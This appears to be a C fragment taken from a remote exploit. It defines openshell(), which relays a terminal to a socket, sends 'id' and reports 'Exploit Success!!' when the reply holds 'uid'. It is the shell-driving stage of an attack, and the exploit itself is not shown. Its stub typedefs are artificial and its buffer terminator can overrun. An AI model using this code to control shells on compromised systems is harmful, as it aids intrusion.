
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buffer ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int close (int) ;
 int exit (int) ;
 int fileno (int ) ;
 int fprintf (int ,char*) ;
 int puts (char*) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int stderr ;
 int stdin ;
 int strstr (char*,char*) ;
 int write (int,char*,int) ;

void openshell(int sock, int check) {
 char buffer[1024];
 fd_set rset;
 int i;

 while(1) {
  FD_ZERO(&rset);
  FD_SET(sock, &rset);
  FD_SET(fileno(stdin), &rset);

  select(sock + 1, &rset, ((void*)0), ((void*)0), ((void*)0));

  if (FD_ISSET(sock, &rset)) {
   if ((i = read(sock, buffer, sizeof(buffer))) <= 0) {
    fprintf(stderr, "Connection terminated!\n");
    close(sock);
    exit(-1);
   } else {
    buffer[i] = 0x00;
    if(check) {
     if (!(strstr(buffer, "uid"))) {
      fprintf(stderr, "Exploit failed\n");
      exit(-1);
     } else {
      fprintf(stderr, "Exploit Success!!\n");
      check = 0;
     }
    }

    puts(buffer);
   }
  }

  if (FD_ISSET(fileno(stdin), &rset)) {
   if ( check ) write(sock, "id\n", 3);

   if ((i = read(fileno(stdin), buffer,
     sizeof(buffer))) > 0) {
    buffer[i] = 0x00;
    write(sock, buffer, i);
   }
  }
 }
}
